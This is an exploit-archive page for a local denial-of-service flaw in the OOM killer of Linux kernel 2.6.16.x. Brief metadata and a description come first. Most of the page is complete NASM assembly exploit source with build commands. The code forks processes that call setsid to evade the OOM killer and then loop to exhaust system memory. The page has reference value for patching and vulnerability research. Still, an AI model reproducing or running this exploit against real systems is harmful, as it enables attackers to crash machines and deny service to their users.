Linux Kernel 2.6.16.x OOM Killer Local Denial of Service Vulnerability

vendor:

Linux Kernel

by:

milw0rm.com

7.2

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Linux Kernel

Affected Version From: 2.6.16.x

Affected Version To: 2.6.16.x

Patch Exists: YES

Related CWE: N/A

CPE: o:linux:linux_kernel:2.6.16.x

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2006

Linux Kernel 2.6.16.x OOM Killer Local Denial of Service Vulnerability

This exploit is a local denial of service vulnerability in the Linux Kernel 2.6.16.x. It creates multiple threads that consume all available memory, causing the system to crash. The exploit uses the setsid() system call to avoid being counted as one thread in the oom_killer().

Mitigation:

The best way to mitigate this vulnerability is to upgrade to a newer version of the Linux Kernel.

Source

Exploit-DB raw data:

;nasm -f elf noHeaven.asm
;ld -s -o noHeaven noHeaven.o

section .text
   global _start

count   equ     8       ; threads count - do it quicker

_start:
       mov     ebx, count
       call    create_threads
       jmp     done
_pause:
       mov     eax,29
       int     0x80
       ret
create_threads:
       mov     eax,2
       int     0x80
       test    eax,eax
       jz      consume
       dec     ebx
       test    ebx,ebx
       jnz     create_threads
       ret
consume:
setsid:         ;       so we won't get counted as one thread in oom_killer()
       xor     ebx,ebx ;       each task will have about 20 oom_score which
       mov     eax,66 ;        is less than 'init' and others
       int     0x80
       push    eax
loopek:
       mov     eax,259
       mov     ebx,0
       mov     ecx,0
       mov     edx,esp
       int     0x80
       jmp     loopek
done:
       xor     ebx,ebx
       mov     eax,1
       int     0x80

; milw0rm.com [2006-04-09]